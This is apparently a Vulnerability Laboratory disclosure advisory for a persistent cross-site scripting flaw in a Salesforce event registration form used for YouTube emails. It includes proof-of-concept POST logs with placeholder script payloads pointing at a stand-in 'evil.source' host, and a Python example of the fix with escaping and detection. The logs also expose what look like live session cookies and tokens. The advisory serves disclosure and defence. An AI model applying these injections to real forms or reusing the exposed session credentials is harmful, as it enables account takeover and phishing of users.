Salesforce RegistrationForm - Persistent Web Vulnerability

2018-06-22T00:00:00
ID VULNERLAB:2054
Type vulnerlab
Reporter Vulnerability Laboratory [Core Research Team] - (research@vulnerability-lab.com) [www.vulnerability-lab.com]
Modified 2018-06-22T00:00:00

Description

                                        
Document Title:
===============
Salesforce RegistrationForm - Persistent Web Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2054

Salesforce Security ID: 219513


Release Date:
=============
2018-06-22


Vulnerability Laboratory ID (VL-ID):
====================================
2054


Common Vulnerability Scoring System:
====================================
4.3


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
Salesforce.com is an American cloud computing company headquartered in San Francisco, California. 
Though its revenue comes from a customer relationship management (CRM) product, Salesforce also 
capitalizes on commercial applications of social networking through acquisition. As of early 2016, 
it is one of the most highly valued American cloud computing companies with a market capitalization 
above $55 billion, although the company has never turned a GAAP profit in any fiscal year since its 
inception in 1999.

(Copy of the Homepage: https://en.wikipedia.org/wiki/Salesforce.com)


Abstract Advisory Information:
==============================
The Vulnerability Laboratory core research team discovered a persistent cross-site scripting web vulnerability in 
the Salesforce RegistrationForm web application used for Google YouTube.


Vulnerability Disclosure Timeline:
==================================
2018-06-22: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Salesforce
Product: Event Registration - Online Service (Web-Application) 2017 Q1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
No authentication (guest)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Responsible Disclosure Program


Technical Details & Description:
================================
A persistent input validation vulnerability has been discovered in the Salesforce event registration form for the 
Google YouTube creators application. This vulnerability type allows remote attackers to inject their own malicious script 
code on the application side, compromising modules and functions in order to carry out targeted client-side attacks. 

The injection point is the Salesforce registration form, and the final affected sender URL is the original YouTube 
domain server. Attackers are able to inject malicious script code to deliver manipulated emails via the original 
YouTube domain sender. The attack vector is located on the application side and the request method used to inject 
is POST. The risk of the vulnerability is estimated as medium to high.

The security risk of the persistent input validation vulnerability is estimated as medium with a CVSS count of 4.2.
Exploitation of the persistent input validation web vulnerability requires low user interaction and no privileged 
web application customer user account. Successful exploitation of the vulnerability results in session hijacking, 
persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of 
affected or connected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Event Registration - Youtube Google

Vulnerable Input Fields(s):
[+] Firstname
[+] Lastname

Vulnerable Parameter(s):
[+] j_id0%3Aj_id32%3Aj_id155%3Ayt_firstnameJA
[+] j_id0%3Aj_id32%3Aj_id155%3Ayt_lastnameJA

Affected Module(s):
[+] Email & Frontend (creator-academy-noreply@youtube.com)

Affected Domain(s):
[+] youtube.com (google)
[+] salesforce (force.com)


Proof of Concept (PoC):
=======================
The persistent cross-site scripting vulnerability can be exploited by remote attackers without a privileged web application user account and with low user interaction.
For a security demonstration, or to reproduce the web vulnerability, follow the information and steps provided below.


Manual steps to reproduce the vulnerability ...
1. Open the vulnerable form
2. Inject the test payloads into the marked vulnerable name input fields
3. Include random values and an existing test mailbox and save the request via POST
Note: The application's incorrect filtering passes the data on to the YouTube creator events
4. An email arrives in the registered and unconfirmed mailbox from the original YouTube sender
5. The payload executes next to the name introduction in the email body message template generated by the DBMS
6. Successful reproduction of the stored XSS web vulnerability!

Note: Both parties need to fix the issue, so I would like to combine the report to assist YouTube on Google and Salesforce 
through their bug bounty programs.


PoC: Vulnerable Source
<tr>
<td style="padding:20px; background-color:#FFF;">
<table style="width:100%;" cellspacing="0" cellpadding="0">
<tr>
<td align="center" style="font-family:Roboto, Helvetica Neue, Helvetica, Arial, sans-serif; 
font-size:24px; line-height:28px; padding-top:10px; color:#666;">
Hey there, "><[MALICIOUS EXECUTE IN NAME]>%20>"<[MALICIOUS EXECUTE IN NAME]>!</td></tr>
<tr>
<td align="center" style="padding-top:30px; font-family:Roboto, Helvetica Neue, Helvetica, Arial, sans-serif; font-size:14px; 
line-height:20px; color:#666;">So you’re ready to take on the world with your channel, huh? That’s awesome! Because we’ve got 
some pretty neat tools and ideas that can help you connect with people all over the globe. Ready to go? Just hit that big red 
button below.</td></tr>


PoC: Youtube Ajax Session Token
QUFFLUhqbVNxbWRpQ05BWTR2aW1fVF83VW1GNWN5M2RSZ3xBQ3Jtc0ttcWYzWlNrUWIzSkktVC1iYkFaajYzNmpGanYyLXNKOHlZRWQzODBITEVY
bmlZSUI1XzFKOTlnaVRGTlZBeTdVb1U2LTN5bWNkbW81dmJXQ3JjVlIxTV9WdmE1UEhvSkJ0NVpHTXhFTUw2ZHkzQjR0RWF5QUpYbWhzbWt2MlJG
c21pTlp2U0Rjelgwd0JVMFJRYlBYWHhBS3hzVVE%3D


--- PoC Session Logs [POST] (Injection Point) ---
Status: 200[OK]
POST https://youtube.secure.force.com/EventRegistration/EventRegistrationPage
Mime Type[text/xml]
   Request Header:
      Host[youtube.secure.force.com]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0]
      Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
      Referer[https://youtube.secure.force.com/EventRegistration/EventRegistrationPage?Id=Q0hMRUFEK2EwNjgwMDAwMDE1Q3ZGZ0FBSw==
	&visit_id=1-636271849160336494-	3810832860&p=youtube_boot_camp&rd=1]
      Content-Length[137382]
      Cookie[BrowserId=yoz2jmeWR3Gx1dy1LaWrAA]
      Connection[keep-alive]
   POST-Daten:
      AJAXREQUEST[_viewRoot]
      j_id0%3Aj_id32[j_id0%3Aj_id32]
      j_id0%3Aj_id32%3AchildTopicIterate%3A0%3Aj_id137%3A0%3Aj_id145[on]
      j_id0%3Aj_id32%3Aj_id155%3Ayt_firstnameJA[%22%3E%3C[MALICIOUS INJECTED XSS PAYLOAD!]%20src%3Devil.source%3E]
      j_id0%3Aj_id32%3Aj_id155%3Ayt_lastnameJA[%22%3E%3C[MALICIOUS INJECTED XSS PAYLOAD!]%20src%3Devil.source%3E]
      j_id0%3Aj_id32%3Aj_id155%3Ayt_email[bkm%40evolution-sec.com]
      j_id0%3Aj_id32%3Aj_id155%3Aj_id177[]
      j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A0%3Aj_id210[To%20learn%20new%20tips%20but%20not%20necessarily%20earn%20a%20letter%20of%20completion.]
      j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A1%3Aj_id206[I%20agree%20to%20receive%20occasional%20emails%20from%20YouTube.]
      j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A2%3Aj_id206[YouTube%20may%20share%20my%20participation%20information%20with%20my%20channel%20owner.]
      com.salesforce.visualforce.ViewState[i%3AAAAAWXsidCI6IjAwRDgwMDAwMDAwUE5UQSIsInYiOiIwMDAwMDAwMDAwMDAwMDAiLCJhIjoidmZlbmNyeXB0aW9ua2V5Ii
	widSI6IjAwNTgwMDAwMDA4OWhGbyJ9mBYmEqvd%2B%2BrqUb8vM1fzpu%2BWhaBToaYNeTJ7jwAAAVtJlHbic6ZoGz41Gk8BAG7fRxiwtjM%2B5P6hSLFA4efTPzm08kfq%2F%2B
	dzoOC95QLuLVPoyIIzHs6xtoomj7aD6qCap52FMutgqS2%2BZ]
      com.salesforce.visualforce.ViewStateVersion[201704062358210694]
      com.salesforce.visualforce.ViewStateMAC	[AGV5SnViMjVqWlNJNkltdGZjRzFJVTNZNE5qQlpSR0pzV1hkd2RYWTBlVkF6YkhsMlQzbENOeTFXYWpZM1dHTnNiRVJMU21kY
	2RUQXdNMlFpTENKMGVYQWlPaUp
	LVjFRaUxDSmhiR2NpT2lKSVV6STFOaUlzSW10cFpDSTZJbnRjSW5SY0lqcGNJakF3UkRnd01EQXdNREF3VUU1VVFWd2lMRndpZGx3aU9sd2lNREF3TURBd01EQXdNR
	EF3TURBd1hDSXNYQ0poWENJNlhDSjJabk5wWjI1cGJtZHJaWGxjSWl4Y0luVmNJanBjSWpBd05UZ3dNREF3TURBNE9XaEdiMXdpZlNJc0ltTnlhWFFpT2xzaWFXRjB
	JbDBzSW1saGRDSTZNVFE1TVRVNE9ERXhPREk0TVN3aVpYaHdJam93ZlE9PS4uX1VJN0g5elhIdjFwVnNOSm80dVJDaVZOaFBJQVIxT1AzVXA1bENfeGRXZz0%3D]
      j_id0%3Aj_id32%3AinitRegistration[j_id0%3Aj_id32%3AinitRegistration]
      []
   Response Header:
      Date[Fri, 07 Apr 2017 18:03:07 GMT]
      x-xss-protection[1; mode=block]
      Cache-Control[no-cache, must-revalidate, max_age=0, no-store,s-maxage=0]
      Content-Security-Policy[reflected-xss block;report-uri /_/ContentDomainCSPNoAuth?type=xss, referrer origin-when-cross-origin]
      X-Powered-By[Salesforce.com ApexPages]
      p3p[CP="CUR OTR STA"]
      Ajax-Response[true]
      Content-Type[text/xml;charset=UTF-8]
      Vary[Accept-Encoding]
      Content-Encoding[gzip]
      Transfer-Encoding[chunked]
-
Status: 200[OK]
POST https://youtube.secure.force.com/EventRegistration/EventRegistrationPage
Mime Type[text/xml]
   Request Header:
      Host[youtube.secure.force.com]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0]
      Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
      Referer[https://youtube.secure.force.com/EventRegistration/EventRegistrationPage?Id=Q0hMRUFEK2EwNjgwMDAwMDE1Q3ZGZ0FBSw==
	&visit_id=1-636271849160336494-		3810832860&p=youtube_boot_camp&rd=1]
      Content-Length[137956]
      Cookie[BrowserId=yoz2jmeWR3Gx1dy1LaWrAA]
      Connection[keep-alive]
   POST-Daten:
      AJAXREQUEST[j_id0%3Aj_id32%3Aj_id155%3Aj_id173]
      j_id0%3Aj_id32[j_id0%3Aj_id32]
      j_id0%3Aj_id32%3AchildTopicIterate%3A0%3Aj_id137%3A0%3Aj_id145[on]
      j_id0%3Aj_id32%3Aj_id155%3Ayt_firstnameJA[%22%3E%3Ciframe%3E%2520%3E%22%3C[MALICIOUS INJECTED XSS PAYLOAD!]%20src%3Devil.source%3E]
      j_id0%3Aj_id32%3Aj_id155%3Ayt_lastnameJA[%22%3E%3C[MALICIOUS INJECTED XSS PAYLOAD!]%20src%3Devil.source%3E]
      j_id0%3Aj_id32%3Aj_id155%3Ayt_email[bkm%40evolution-sec.com]
      j_id0%3Aj_id32%3Aj_id155%3Aj_id177[Yes]
      j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A0%3Aj_id210[To%20learn%20new%20tips%20but%20not%20necessarily%20earn%20a%20letter%20of%20completion.]
      j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A1%3Aj_id206[I%20agree%20to%20receive%20occasional%20emails%20from%20YouTube.]
      j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A2%3Aj_id206[YouTube%20may%20share%20my%20participation%20information%20with%20my%20channel%20owner.]
      com.salesforce.visualforce.ViewState[i%3AAAAAWXsidCI6IjAwRDgwMDAwMDAwUE5UQSIsIWxcDiHyDaSOw17yd3Cg%3D]
      com.salesforce.visualforce.ViewStateVersion[201704062358210694]
      com.salesforce.visualforce.ViewStateMAC	[AGV5SnViMjVqWlNJNkluWnlWa1owVDBoNFNrMTFOM0ZyV1dwTk9UbHNSR1JPUm1seFJtZHlTM0JuTWs1blJVSkVTR2g0VDNOY2RUQXdNMlFpT
	ENKMGVYQWlPaUpLVjFRaUxDSmhiR2NpT2lKSVV6STFOaUlzSW10cFpDSTZJbnRjSW5SY0lqcGNJakF3UkRnd01EQXdNREF3VUU1VVFWd2lMRndp
	ZGx3aU9sd2lNREF3TURBd01EQXdNREF3TURBd1hDSXNYQ0poWENJNlhDSjJabk5wWjI1cGJtZHJaWGxjSWl4Y0luVmNJanBjSWpBd05UZ3dNREF
	3TURBNE9XaEdiMXdpZlNJc0ltTnlhWFFpT2xzaWFXRjBJbDBzSW1saGRDSTZNVFE1TVRVNE9ERTRPRE01TUN3aVpYaHdJam93ZlE9PS4uVW9Qal
	BBWmNIQjhXRkU4Ulh0THB2T2VzYThkR2dxZE13ZFdOWnM4dVIzbz0%3D]
      j_id0%3Aj_id32%3Aj_id155%3Aj_id177%3Aj_id178[j_id0%3Aj_id32%3Aj_id155%3Aj_id177%3Aj_id178]
      []
   Response Header:
      Date[Fri, 07 Apr 2017 18:03:12 GMT]
      x-xss-protection[1; mode=block]
      Cache-Control[no-cache, must-revalidate, max_age=0, no-store,s-maxage=0]
      Content-Security-Policy[reflected-xss block;report-uri /_/ContentDomainCSPNoAuth?type=xss, referrer origin-when-cross-origin]
      X-Powered-By[Salesforce.com ApexPages]
      p3p[CP="CUR OTR STA"]
      Ajax-Response[true]
      Content-Type[text/xml;charset=UTF-8]
      Vary[Accept-Encoding]
      Content-Encoding[gzip]
      Transfer-Encoding[chunked]
-
Status: 200[OK]
POST https://www.youtube.com/creator_suggestions_ajax?new_state=EVENT_SEEN&suggestion=ytca_analytics_series_2016&location=LOCATION_CHANNEL_CHECKLIST&ui_type=
UI_TYPE_DEFAULT&action_update_channel_suggestion=1
Mime Type[application/json]
   Request Header:
      Host[www.youtube.com]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0]
      Accept[*/*]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate, br]
      X-YouTube-Client-Name[1]
      X-YouTube-Client-Version[1.20170406]
      X-YouTube-Identity-Token[QUFFLUhqbkJrbDU2d2cyQk82ZHBZVEc3Tmhyck9teHkzUXw=]
      X-YouTube-Page-CL[152397198]
      X-YouTube-Page-Label[youtube_20170406_0_RC2]
      X-YouTube-Variants-Checksum[2275f96a3a17364aca2366efd7c35d46]
      Content-Type[application/x-www-form-urlencoded]
      Referer[https://www.youtube.com/user/vulnerability0lab]
      Content-Length[284]
      Cookie[VISITOR_INFO1_LIVE=XKr3svEjLco; PREF=f1=50000000&f5=30; YSC=BnHxqoYEhPg; 
	SID=igTRRvC2JTQVE0SXFw0-Jz7I_7brhhCMfb0JocaqLmzZwFWtpYplR1QDIa8VW3BeFKVebQ.; HSID=AfImtCSKjlhjrHodg; 
	SSID=AhWHw2um0Z7WVLOQv; APISID=_ONLJITyRiSfF0or/AKPVNxNp084EAZmxm; SAPISID=tnogHnh4UrZzCXpK/AMF9HkrXhYZRzy2EY; 
	CONSENT=YES+DE.de+20150712-15-0; LOGIN_INFO=AOmCA4wwRQIgekLu-fXR9_7sZgXdrFjyCn_V2riu05Uod5AfZgMn8Q8CIQC7NOOvc_
	FfvwbmqBPi0MajBNCQO2AbfktTASPb9bwAdg:QUZVTU5Gd19RV3JFZUhXa
	3FINUhSYmh5WE8xdDk4cmY5d25KaXB2M1NFYWUwYVY2UFdQMFQ3YWd0amx4QTVzYnZhNHBPb241NGFCMGQ3T05LcmhReEwyQTBKWnl4enMxOH
	FRTFBqY2tiRllIdDNCQk9PcnQyRVNPaGduakg1WVU0OTV5eFlVeW44dTNOc3BOM2M1c0pCVlJHNUVseTRBWU53]
      DNT[1]
      Connection[keep-alive]
   POST-Daten:
      o[U]
      session_token	[QUFFLUhqbVNxbWRpQ05BWTR2aW1fVF83VW1GNWN5M2RSZ3xBQ3Jtc0ttcWYzWlNrUWIzSkktVC1iYkFaajYzNmpGanYyLXNKOHlZRWQzODBITEVY
	bmlZSUI1XzFKOTlnaVRGTlZBeTdVb1U2LTN5bWNkbW81dmJXQ3JjVlIxTV9WdmE1UEhvSkJ0NVpHTXhFTUw2ZHkzQjR0RWF5QUpYbWhzbWt2MlJG
	c21pTlp2U0Rjelgwd0JVMFJRYlBYWHhBS3hzVVE%3D]
   Response Header:
      Strict-Transport-Security[max-age=31536000]
      x-frame-options[SAMEORIGIN]
      Content-Length[15]
      Content-Disposition[attachment]
      X-Content-Type-Options[nosniff]
      Expires[Tue, 27 Apr 1971 19:44:06 EST]
      Cache-Control[no-cache]
      Content-Type[application/json; charset=UTF-8]
      Date[Fri, 07 Apr 2017 18:03:21 GMT]
      Server[YouTubeFrontEnd]
      x-xss-protection[1; mode=block]
      Alt-Svc[quic=":443"; ma=2592000; v="37,36,35"]
      X-Firefox-Spdy[h2]
-
Status: 200[OK]
POST https://www.youtube.com/creator_suggestions_ajax?new_state=EVENT_SEEN&suggestion=ytca_community_2017&location=LOCATION_CHANNEL_CHECKLIST&ui_type=UI_TYPE_DEFAULT&action_update_channel_suggestion=1 
Mime Type[application/json]
   Request Header:
      Host[www.youtube.com]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0]
      X-YouTube-Client-Name[1]
      X-YouTube-Client-Version[1.20170406]
      X-YouTube-Identity-Token[QUFFLUhqbkJrbDU2d2cyQk82ZHBZVEc3Tmhyck9teHkzUXw=]
      X-YouTube-Page-CL[152397198]
      X-YouTube-Page-Label[youtube_20170406_0_RC2]
      X-YouTube-Variants-Checksum[2275f96a3a17364aca2366efd7c35d46]
      Content-Type[application/x-www-form-urlencoded]
      Referer[https://www.youtube.com/user/vulnerability0lab]
      Content-Length[284]
      Cookie[VISITOR_INFO1_LIVE=XKr3svEjLco; PREF=f1=50000000&f5=30; YSC=BnHxqoYEhPg; 
	SID=igTRRvC2JTQVE0SXFw0-Jz7I_7brhhCMfb0JocaqLmzZwFWtpYplR1QDIa8VW3BeFKVebQ.; HSID=AfImtCSKjlhjrHodg; 
	SSID=AhWHw2um0Z7WVLOQv; APISID=_ONLJITyRiSfF0or/AKPVNxNp084EAZmxm; SAPISID=tnogHnh4UrZzCXpK/AMF9HkrXhYZRzy2EY; 
	CONSENT=YES+DE.de+20150712-15-0; LOGIN_INFO=AOmCA4wwRQIgekLu-fXR9_7sZgXdrFjyCn_V2riu05Uod5AfZgMn8Q8CIQC7NOOvc_
	FfvwbmqBPi0MajBNCQO2AbfktTASPb9bwAdg:
	QUZVTU5Gd19RV3JFZUhXa3FINUhSYmh5WE8xdDk4cmY5d25KaXB2M1NFYWUwYVY2UFdQMFQ3YWd0amx4QTVzYnZh
	NHBPb241NGFCMGQ3T05LcmhReEwyQTBKWnl4enMxOHFRTFBqY2tiRllIdDNCQk9PcnQyRVNPaGduakg1WVU0OTV5e
	FlVeW44dTNOc3BOM2M1c0pCVlJHNUVseTRBWU53; ST-1qyw03o=ei=8tPnWPWNE4O7WYKQkNgB&feature=
	rc-rel&ved=CMgDEPQcGAAiEwj1zrDO9pLTAhWDXRYKHQIIBBsomxw&csn=8tPnWPWNE4O7WYKQkNgB]
      Connection[keep-alive]
   POST-Daten:
      o[U]
      session_token	[QUFFLUhqbVNxbWRpQ05BWTR2aW1fVF83VW1GNWN5M2RSZ3xBQ3Jtc0ttcWYzWlNrUWIzSkktVC1iYkFaajY
	zNmpGanYyLXNKOHlZRWQzODBITEVYbmlZSUI1XzFKOTlnaVRGTlZBeTdVb1U2LTN5bWNkbW81dmJXQ3JjVlI
	xTV9WdmE1UEhvSkJ0NVpHTXhFTUw2ZHkzQjR0RWF5QUpYbWhzbWt2MlJGc21pTlp2U0Rjelgwd0JVMFJRYlBYWHhBS3hzVVE%3D]
   Response Header:
      X-Content-Type-Options[nosniff]
      Content-Type[application/json; charset=UTF-8]
      Expires[Tue, 27 Apr 1971 19:44:06 EST]
      Strict-Transport-Security[max-age=31536000]
      Content-Length[15]
      x-frame-options[SAMEORIGIN]
      Cache-Control[no-cache]
      Content-Disposition[attachment]
      Date[Fri, 07 Apr 2017 18:03:26 GMT]
      Server[YouTubeFrontEnd]
      x-xss-protection[1; mode=block]
      Alt-Svc[quic=":443"; ma=2592000; v="37,36,35"]
      X-Firefox-Spdy[h2]
-
Status: 200[OK]
POST https://youtube.secure.force.com/EventRegistration/EventRegistrationPage
Mime Type[text/xml]
   Request Header:
      Host[youtube.secure.force.com]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0]
      Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
      Referer[https://youtube.secure.force.com/EventRegistration/EventRegistrationPage?Id=Q0hMRUFEK2EwNjgwMDAwMDE1Q3ZGZ0FBSw==
	&visit_id=1-636271849160336494-	3810832860&p=youtube_boot_camp&rd=1]
      Content-Length[137818]
      Cookie[BrowserId=yoz2jmeWR3Gx1dy1LaWrAA]
      Connection[keep-alive]
   POST-Daten:
      AJAXREQUEST[_viewRoot]
      j_id0%3Aj_id32[j_id0%3Aj_id32]
      j_id0%3Aj_id32%3AchildTopicIterate%3A0%3Aj_id137%3A0%3Aj_id145[on]
      j_id0%3Aj_id32%3Aj_id155%3Ayt_firstnameJA[%22%3E%3C[MALICIOUS INJECTED XSS PAYLOAD!]%20src%3Devil.source%3E]
      j_id0%3Aj_id32%3Aj_id155%3Ayt_lastnameJA[%22%3E%3C[MALICIOUS INJECTED XSS PAYLOAD!]%20src%3Devil.source%3E]
      j_id0%3Aj_id32%3Aj_id155%3Ayt_email[bkm%40evolution-sec.com]
      j_id0%3Aj_id32%3Aj_id155%3Aj_id177[Yes]
      j_id0%3Aj_id32%3Aj_id155%3Aj_id186[https%3A%2F%2Fwww.youtube.com%2Fuser%2FDellVlog]
      j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A0%3Aj_id210[To%20learn%20new%20tips%20but%20not%20necessarily%20earn%20a%20letter%20of%20completion.]
      j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A1%3Aj_id206[I%20agree%20to%20receive%20occasional%20emails%20from%20YouTube.]
      j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A2%3Aj_id206[YouTube%20may%20share%20my%20participation%20information%20with%20my%20channel%20owner.]
      com.salesforce.visualforce.ViewState[i%3AAAAAWXsidCI3lYNdCa7hoyPCYB2pOU8KcV%2FuljILNXTK21XGpDFdR1RhEn%2BIaDaP1MJtc5lq1ZYj2vtBBwiM2XiyZ6ynF
	KIdgT53K5Pu28vND9fJ9Q8T%2FP%2FMxHqJ9ohFeKza8vyggT%2F72a%2FP]
      com.salesforce.visualforce.ViewStateVersion[201704062358210694]
      com.salesforce.visualforce.ViewStateMAC	[AGV5SnViMjVqWlNJNkltVXRZbGxtTTBOTWNFZHNhbXBqVkhaa2RITjZVblJpWkdzd1VrbzJTbTVCUjFod1ExRTNhSEJXUlRCY2RUQXd
	NMlFpTENKMGVYQWlPaUpLVjFRaUxDSmhiR2NpT2lKSVV6STFOaUlzSW10cFpDSTZJbnRjSW5SY0lqcGNJakF3UkRnd01EQXdNREF3VUU
	1VVFWd2lMRndpZGx3aU9sd2lNREF3TURBd01EQXdNREF3TURBd1hDSXNYQ0poWENJNlhDSjJabk5wWjI1cGJtZHJaWGxjSWl4Y0luVmN
	JanBjSWpBd05UZ3dNREF3TURBNE9XaEdiMXdpZlNJc0ltTnlhWFFpT2xzaWFXRjBJbDBzSW1saGRDSTZNVFE1TVRVNE9ERTVNekF3TUN
	3aVpYaHdJam93ZlE9PS4uQS10bExWZFhwT3VTVlFqWEhZeVdaSG5MMjBfRGlTTlhxU3ljYkdrandPUT0%3D]
      j_id0%3Aj_id32%3AinitRegistration[j_id0%3Aj_id32%3AinitRegistration]
      []
   Response Header:
      Date[Fri, 07 Apr 2017 18:03:31 GMT]
      x-xss-protection[1; mode=block]
      Cache-Control[no-cache, must-revalidate, max_age=0, no-store,s-maxage=0]
      Content-Security-Policy[reflected-xss block;report-uri /_/ContentDomainCSPNoAuth?type=xss, referrer origin-when-cross-origin]
      X-Powered-By[Salesforce.com ApexPages]
      p3p[CP="CUR OTR STA"]
      Pragma[no-cache]
      Ajax-Response[true]
      Content-Type[text/xml;charset=UTF-8]
      Vary[Accept-Encoding]
      Content-Encoding[gzip]
      Transfer-Encoding[chunked]


Reference(s):
https://youtube.secure.force.com/
https://youtube.secure.force.com/EventRegistration/
https://youtube.secure.force.com/EventRegistration/EventRegistrationPage
https://www.youtube.com/
https://www.youtube.com/creator_suggestions_ajax


Solution - Fix & Patch:
=======================
1. Restrict the input fields and disallow the use of special characters
2. Parse or escape all inputs when processing the POST method request
3. Sanitize the output in the email notification on both sides, force.com and youtube.com, to prevent targeted exploitation

The issue was resolved by the Salesforce developer team at the end of 2017 Q4. The issue was also 
reported to Google YouTube to ensure that malformed content from the input is not forwarded insecurely 
to customers or users. The issue has been resolved on both sides.
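The three fix steps above, carried through in code as an added example (editor's illustration, not Salesforce's, Google's or Vulnerability Laboratory's code, and written in Python rather than Apex/Visualforce so it runs stand-alone). It places the weak pattern from the quoted email template (raw form value substituted into the greeting) beside a hardened version that restricts the name fields on input and HTML-escapes them on output, and adds the kind of outbound check the sending side can run to detect unescaped markup before an email leaves. The sample names, the name policy in NAME_RE and the function names are all constructed assumptions for this example:

```python
import html
import re

# Constructed sample inputs (not taken from the advisory): a benign name and
# two values carrying the kind of markup the advisory's placeholder stands for.
BENIGN_FIRST = "Ada"
BENIGN_LAST = "Lovelace"
MARKUP_FIRST = '"><iframe src=x>'
MARKUP_LAST = '"><img src=x>'

# Greeting line modelled on the email template quoted in the advisory.
# The template itself emits no HTML tags, so any tag in the rendered
# greeting can only have come from user input.
TEMPLATE = "Hey there, {first} {last}!"
TEMPLATE_TAGS = frozenset()


def render_vulnerable(first, last):
    """Weak pattern: raw form values substituted into the HTML email body."""
    return TEMPLATE.format(first=first, last=last)


# Fix step 1: restrict the input field. Hypothetical policy: must start
# with a letter, then letters, spaces, apostrophes or hyphens, 64 chars max.
NAME_RE = re.compile(r"^[^\W\d_](?:[^\W\d_]|[ '\-]){0,63}$")


def validate_name(value):
    """True if the value satisfies the name policy above."""
    return NAME_RE.fullmatch(value) is not None


# Fix steps 2 and 3: escape at the point where the value enters HTML,
# independent of what validation did upstream (defence in depth).
def render_hardened(first, last):
    """HTML-escape both names before substituting them into the template."""
    return TEMPLATE.format(first=html.escape(first, quote=True),
                           last=html.escape(last, quote=True))


def process_registration(first, last):
    """Validate on input, escape on output; reject anything off-policy."""
    for label, value in (("first name", first), ("last name", last)):
        if not validate_name(value):
            raise ValueError("rejected %s: characters outside the name policy" % label)
    return render_hardened(first, last)


# Outbound check on the sending side: tag names present in the rendered
# body that the template never emits. A non-empty result means user input
# reached the HTML unescaped and the message should be held, not sent.
TAG_RE = re.compile(r"<\s*/?\s*([a-zA-Z][\w-]*)")


def unexpected_tags(body, allowed=TEMPLATE_TAGS):
    """Return sorted tag names found in body that are not in the allowed set."""
    found = {m.group(1).lower() for m in TAG_RE.finditer(body)}
    return sorted(found - set(allowed))


if __name__ == "__main__":
    weak = render_vulnerable(MARKUP_FIRST, MARKUP_LAST)
    print("vulnerable render :", weak)
    print("unexpected tags   :", unexpected_tags(weak))
    safe = render_hardened(MARKUP_FIRST, MARKUP_LAST)
    print("hardened render   :", safe)
    print("unexpected tags   :", unexpected_tags(safe))
    print("benign via policy :", process_registration(BENIGN_FIRST, BENIGN_LAST))
```

The input restriction and the output escaping are deliberately separate functions: the registration form (force.com side) owns the first, the mail generator (youtube.com side) owns the second, and the advisory's point is that each party must apply its own step rather than rely on the other. The unexpected_tags check is the cheap detective control that would have flagged the quoted email body, since the greeting template contains no tags of its own.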


Security Risk:
==============
The security risk of the persistent cross-site scripting vulnerability is estimated as medium to high (CVSS 4.3). 
Targeted user accounts are not able to identify the manipulated content because it is received from the original sender.


Credits & Authors:
==================
Vulnerability Laboratory [Core Research Team] - (research@vulnerability-lab.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, 
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. 

Domains:    www.vulnerability-lab.com		- www.vulnerability-db.com					- www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.

				    Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™